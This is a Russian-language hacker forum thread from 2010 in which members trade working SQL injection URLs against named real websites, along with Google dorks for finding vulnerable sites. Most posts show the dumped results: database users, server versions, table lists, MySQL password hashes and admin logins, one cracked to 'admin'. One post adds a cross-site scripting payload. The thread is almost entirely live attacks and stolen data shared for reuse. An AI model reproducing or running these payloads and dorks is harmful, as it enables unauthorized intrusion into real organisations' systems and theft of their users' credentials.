RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2010-06-12 23:24:59.990000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: Epic Fail
Alex.Black, копипастить скули легко, а слабо свои искать?
Я и ищу в гугле, а не беру с других ресурсов (мне это не нужно):
inurl:id= и тебе открывается млн сайтов. Из них несколько тысяч уязвимых.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-12 23:30:18.906666
|
|
|
Epic Fail
Сообщений: 18
Оценки: 0
Присоединился: 2010-04-12 20:41:12.853333
|
Alex.Black но ты ведь копируешь скули с других сайтов сюда. вот например
Якобы твоя скуля.
http://water.grace.edu/news.php?id=-17+union+select+1,2,file_priv,4,concat_ws(0x3a3a3a,user,password),6+from+mysql.user+limit+0,1+--+
находится тут http://forum.hack-team.info/showthread.php?p=27967
Это наводит на мысли.
К тебе даже Pashkela обратился:
quote:
Просьба хитромудрым товарищам - каждая скуля легко пробивается в гугле, постите свои скули, или, даже если они ваши, проверяйте, перед тем как постить.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-12 23:32:31.733333
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
))) посмотри разницу в скулях
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-12 23:33:28.946666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://water.grace.edu/news.php?id=-17+union+select+1,2,file_priv,4,concat_ws(0x3a3a3a,user,password),6+from+mysql.user+limit+0,1+--+ Это и есть моя скуля. Например: Top-10 :)
http://water.grace.edu/news.php?id=-17+union+select+1,2,file_priv,4,concat_ws(0x3a3a3a,user,password),6+from+mysql.user+limit+0,10+--+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-12 23:35:32.340000
|
|
|
Epic Fail
Сообщений: 18
Оценки: 0
Присоединился: 2010-04-12 20:41:12.853333
|
А есть люди которые тупо копипастят скули с других сайтов, предварительно изменив несколько значений. Кто бы это мог быть?
На том сайте скуля была размещена 27.09.2009, 03:19
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-12 23:36:40.750000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
Ладно забейте на обсудение, замечание понял. Если уже по существу, то давайте введем в гугле:
inurl:id= и будем искать. А не флудить и оффтопить :)
Если точнее запрос, то лучше набрать в гугле:
site: .net inurl:news.php?id= Сразу переходим на 40 страницу, там полно сайтов с уязвимостями в mysql.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-12 23:38:33.010000
|
|
|
Epic Fail
Сообщений: 18
Оценки: 0
Присоединился: 2010-04-12 20:41:12.853333
|
Если попробовать погуглить размещенные Alex.Blackом скули то гугл выдает раздачу скулей на хакзоне. Вот так случайность.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 00:12:53.420000
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://www.coshuk.com/html/images.php?id=-38+union+select+1,concat(0x2a,user(),0x2a,database(),0x2a,version()),3,4,5,6,7,8,9,10,11,12,13 User: coshadmin@localhost
Database: coshuk_com_-_coshdb
Version: 5.0.51a-community-log
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 00:18:58.630000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
Epic Fail, теперь ты должен быть доволен:
http://www.insanely-great.com/news.php?id=-9487+union+select+1,2,3,concat_ws(0x3a3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18+limit+0,1+--+ Version: 4.1.21-log
User: flamini_flaminio@216.14.208.109
Database: flamini_igm
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 01:10:51.736666
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://ihscslnews.org/view_article.php?id=-57+union+select+1,concat_ws(0x2a,user(),0x2a,database(),0x2a,version()),3,4,5,6,7 User: ihscslnews@pristina.dreamhost.com
Database: ihscslnews
Version: 5.1.39-log
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 01:22:52.343333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.hispanicprwire.com/news.php?l=in&id=17162+union+select+1,2,3,user(),version(),database(),7,8,9,10+--+ Version: 5.1.44
User: hprw_user@cinaruco.venred.com
Database: hispanicprwirecom
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 01:52:44.140000
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://www.bbcw.be/content.php?id=-90+union+select+1,2,3,concat(0x2a,user(),0x2a,database(),0x2a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 User: pirlins_bbcw@localhost
Database: pirlins_bbcw
Version: 5.0.87-community-log
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 18:06:54.093333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.symbiant.org/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),concat_ws(0x3a,username,password),6,7+from+users--+ Version: 5.0.90-log
User: symbiweb@localhost
Database: symbiant
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 18:33:39.123333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.iatws.org/news.php?menu=1&id=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9--+ Version: 4.1.22-standard
User: beltwres_bigimot@localhost
Database: beltwres_iatws
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 19:03:07.160000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.discoveruu.com/news.php?id=-0127+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6+--+ Version: 5.0.27-standard
User: asawyer@localhost
Database: feeds
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 19:58:19.696666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://imperial.ca.gov/section.php?id=-10+order+by+1/*
Host IP: 207.62.96.7
Web Server: Apache/2.0.59 (Win32) PHP/5.2.0
Powered-by: PHP/5.2.0
DB Server: MySQL >=5
Current User: ricardohdz@localhost
Sql Version: 5.0.27-community-nt
Current DB: imperial
System User: ricardohdz@localhost
Installation dir: c:\wamp\mysql\
DB User & Pass: root::localhost
ricardo:*23A07ABC61CC2DFC7E3B0B5DB3571848DF57C9C3:localhost
ricardohdz:*23A07ABC61CC2DFC7E3B0B5DB3571848DF57C9C3:localhost
Data Bases: information_schema
imperial
imperial_backup
ipl_drp
mysql
phpmyadmin
test
vcalendar
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-13 21:52:02.156666
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://podcastchicago.tv/category.php?id=-30+union+select+1,2,concat(0x2a,user(),0x2a,database(),0x2a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 User: root@localhost
Database: karlprod_-_podcasts
Version: 5.0.67-log
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-14 03:24:49.720000
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://www.warwick-grove.com/news_article.html?id=-30+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x2a,user(),0x2a,database(),0x2a,version()) User: warwick@blueion.com
Database: warwick
Version: 5.0.81-rs-log
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-14 19:02:57.900000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.martsoft.co.uk/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--+ Version: 4.1.22-standard
User: mgreen_martsoft@localhost
Database: mgreen_martsoft
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-16 00:56:30.316666
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://www.worstpreviews.com/review.php?id=-30+union+select+concat(0x2a,user(),0x2a,database(),0x2a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 User: alexgi_2@localhost
Database: alexgi_worstreview
Version: 5.0.90-log
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-16 01:43:58.846666
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://shop.southworth.com/groups.php?cat=4&group=-21+union+select+1,concat(0x2a,user(),0x2a,database(),0x2a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 User: swdata@localhost
Database: shopping_cart
Version: 4.1.22
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-16 04:53:33.933333
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
http://bazaar-bonzo.com/page/news.php?id=-99999999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6
Version : 5.0.90-log
User : bazaarbonzo@10.0.95.116
Database : bazaarbonzo
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-16 07:01:32.956666
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
quote:
ORIGINAL: Vlados777
http://shop.southworth.com/groups.php?cat=4&group=-21+union+select+1,concat(0x2a,user(),0x2a,database(),0x2a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 User: swdata@localhost
Database: shopping_cart
Version: 4.1.22
Здесь же xss
http://shop.southworth.com/groups.php?cat=4&group=-21+union+select+1,concat%280x2a,user%28%29,0x2a,database%28%29,0x2a,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+%3Cscript%3Ealert%28%27xss!%27%29;%3C/script%3E
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-16 16:45:38.396666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.michaelkenna.net/gallery.php?id=-33+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10-- Version: 5.1.47-community-log - отлично :)
User: michafj0_public@localhost
Database: michafj0_mkenna
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-16 23:38:48.670000
|
|
|
InsiDder_
Сообщений: 26
Оценки: 0
Присоединился: 2010-06-15 02:07:00.380000
|
http://www.dynamicinst.net/news.php?id=-25+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5-- 5.0.27:dynamic:dynamicdb@localhost
Еще прикольно то что пароль админа Webb
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-16 23:48:17.630000
|
|
|
InsiDder_
Сообщений: 26
Оценки: 0
Присоединился: 2010-06-15 02:07:00.380000
|
http://pavlodar-auto.kz/info/view.php?id=-26+union+select+1,2,3,4,group_concat(0x0b,table_name),6,7,8,9,10+from+information_schema.tables--
Версия - 5.0.81-community
БД - autod960_PavlodarDB
Пользователь БД - autod960_PavDB@localhost
CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
partners_auto,
statya_auto
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 00:20:11.540000
|
|
|
InsiDder_
Сообщений: 26
Оценки: 0
Присоединился: 2010-06-15 02:07:00.380000
|
http://www.ascot.ru/catalog/index.php?id=15'
http://www.mostpp.ru/news.php?id=3724
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 00:50:33.153333
|
|
|
InsiDder_
Сообщений: 26
Оценки: 0
Присоединился: 2010-06-15 02:07:00.380000
|
http://makovetskiy.ru/news.php?id=1464'
http://www.evrocom.ru/news.php?id=352'
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 01:00:23.900000
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
http://www.u-power.ru/index.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),11,12--
4.0.27-max-log
upower36@v46.valuehost.ru
upower36
http://niigb.ru/index.php?id=-5+union+select+concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),2,3,4,5,6--
4.1.25-log
niigb@localhost
wwwniigbru_cmsmy_niigb
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 01:37:42.516666
|
|
|
InsiDder_
Сообщений: 26
Оценки: 0
Присоединился: 2010-06-15 02:07:00.380000
|
http://www.basisb.ru/news.php?id=-9+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5--
5.0.67:b26413:u26413@78.108.84.17
http://www.basisb.ru/news.php?id=-9+union+select+1,group_concat(0x0b,table_name),3,4,5+from+information_schema.tables–
CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
articles,
catalog,
category,
news,
page_titles,
pages_content,
users
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 10:44:46.750000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
Да простят меня фанаты ФК Анжи…
http://www.fc-anji.ru/news.php?id=-747+select+union+1,2,3,4,5,6/*
Host IP: 89.111.176.85
Web Server: nginx/0.7.63
Powered-by: PHP/5.2.10
DB Server: MySQL unknown ver
Current User: opendag@localhost
Sql Version: 4.1.25-log
Current DB: wwwopendagru
System User: opendag@localhost
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 13:51:54.246666
|
|
|
ladder
Сообщений: 7
Оценки: 0
Присоединился: 2010-06-09 20:00:29.076666
|
http://www.veroint.com/products.php?page_id=-1%20union%20select%201,2,3,group_concat(table_name)%20from%20information_schema.tables%20where%20TABLE_ROWS%3E0
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 14:32:26.700000
|
|
|
InsiDder_
Сообщений: 26
Оценки: 0
Присоединился: 2010-06-15 02:07:00.380000
|
http://www.veroint.com/products.php?page_id=-1%20union%20select%201,2,3,group_concat(0x0a,table_name)%20from%20information_schema.tables%20where%20TABLE_ROWS%3E0
Вот так думаю лучше будет =).
5.0.45-community-nt - version
vero_us - database
root@localhost - user
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 20:12:28.806666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://bollystic.com/Bollywood/showMovie.php?id=-564 union select 1,2,3,4,group_concat(user,0x3a,password),6,7,8,9,10 from mysql.user-- http://flashgamestudio.com/flash_games/flash_games.php?id=-15 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15-- http://sacramento.jumpskyhigh.com/page.php?pageID=-213%20union%20select%201,group_concat(u_name,0x3a,u_email,0x3a,u_password)%20fro m%20es_user-- http://scmsgroup.org/php/show_newsdetails.php?newsid=-49%20union%20select%201,2,group_concat(username,0x3a,userpassword),4,5,6,7,8,9%2 0from%20admin http://www.adultfyi.com/read.php?ID=-29844 union select 1,2,@@version,4,5,6,7,8-- http://www.aeo.com.pk/indexnew.php?id=-17 union select 1,2,group_concat(id,0x3a,login,0x3a,password),4,5,6,7 from sadmin-- http://www.agrement.co.za/newsitem.php?NID=-18 union select 1,2,3,4,5,group_concat(fUName,0x3a,fPword),7 from tbladmin-- http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins-- http://www.americanschoolfes.com/curriculum.php?id=-2 union select 1,2,3,group_concat(id_usr,0x3a,username_usr,0x3a,pword_usr),5,6 from users_usr -- http://www.arcadepod.com/java/details.php?id=-3140 union select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- http://www.arthritiscentral.com/index.php?page=fromdesk.php&aid=-74 union select 1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12 from admins-- http://www.art-ks.org/index.php?id=-134%20union%20select%201,2,3,group_concat%28login,0x3a,pwd%29,5,6,7,8,9,10%20from%20%E2%80%8Busers-- http://www.ashanet.org/projects/document...p?id=-2816 union select 1,2,3,4,5,6,7,8,group_concat(name,0x3a,password),10,11,12,13 from chapter-- http://www.biggboss2.in.com/contestants.php?id=-3%20union%20select%201,group_concat(id,0x3a,username,0x3a,passwd),3,4,5%20from%2 0author-- http://www.canalsplash.com/event.php?id=-93%20union%20select%201,2,3,4,group_concat(uname,0x3a,upassword,0x3a,uadmin),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20user-- http://www.cida.ge/eng/articles.php?id=-76 union select 1,2,3,4,5,group_concat(id,0x3a,name,0x3a,passwd),7,8 from user-- http://www.clan-r1.com/id.php?id=show_member&member=-21 union select 1,group_concat(id,0x3a,user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from wp_users-- http://www.cokethorpe.org.uk/index.cfm?fuseaction=ourschool.content&cmid=-111%20union%20select%201,2,3,4,5,6,7,8,group_concat(uname,0x3a,pword),10,11,12,1 3%20from%20users--
http://www.cokethorpe.org.uk/index.cfm?fuseaction=ourschool.content&cmid=-111%20union%20select%201,2,3,4,5,6,7,8,group_concat(email,0x3a,pword),10,11,12,1 3%20from%20members-- http://www.fatecalls.com/index.php?cid=-1%20union%20select%201,2,group_concat(user_name,0x3a,user_password),4,5,6,7 from avcboost_autotrade-- http://www.jet-travel.com/produit.php?id=-83%20union%20all%20select%201,group_concat(id_admin,0x3a,log_admin,0x3a,pass_adm in),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20admins--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-17 23:59:50.316666
|
|
|
ladder
Сообщений: 7
Оценки: 0
Присоединился: 2010-06-09 20:00:29.076666
|
http://www.tamarind.co.ke/restaurant.php?id=-1%20union%20select%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.tables%20where%20table_rows%3E100+–+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-18 03:23:36.680000
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://sundaytimes.lk/cms/articleXYZ100000010.php?id=-5955+union+select+1,2,concat(uname,0x2a,password),4,5,6,7,8+from+users User: admin
Password: 21232f297a57a5a743894a0e4a801fc3
Расшифровка 21232f297a57a5a743894a0e4a801fc3 = admin
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-18 03:38:08.026666
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://www.templateshunt.com/template.php?id=-28801+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(user(),0x2a,database(),0x2a,version()),22,23 User: temphunt_root@localhost
Database: temphunt_template
Version: 4.1.22-standard
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-18 10:58:21.836666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.bcspeakers.net/product.php?id=-0000000185+union+select+1,2,3,4,5,6,group_concat(table_name+separator+0x3a),8,9,10,11,12,13,14,15+from+information_schema.tables--+ Version: 5.1.37-1ubuntu5.4
User: bcadm_db@localhost
Database: bc_db
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-18 12:15:47.936666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://itmaasia2010.net/news.php?id=-23+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+ Version: 5.1.33-community
User: citme_wanhu@localhost
Database: exhibition
http://itmaasia2010.net/news.php?id=-23+union+select+1,2,concat_ws(0x3a,user,password,file_priv),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user--+ User: citme_wanhu
Password: *609F3B964379BF9A15167B8D55DA325DBC3A32E6
File_Priv=Y
http://itmaasia2010.net/news.php?id=-23+union+select+1,2,group_concat(table_name+separator+0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables--+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-06-18 15:02:15.710000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.elliott-adams.co.uk/index.php?pageid=6+and+1=0+Union+Select+null,null,null,null,concat%280x494E43,@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29-- http://www.skatersedge.co.uk/product_list.php?id=1+and+1=0+Union+Select+null,null,concat%280x494E43,@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,null,null,null-- http://www.oneplusone.org.uk/ICOR/ResearchAndPolicyNews.php?Month=11&Year=2005+and+1=0+=null+Union+Select+null,null,concat%280x494E43,@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,null,null,null--
|
|
|
|
|
|
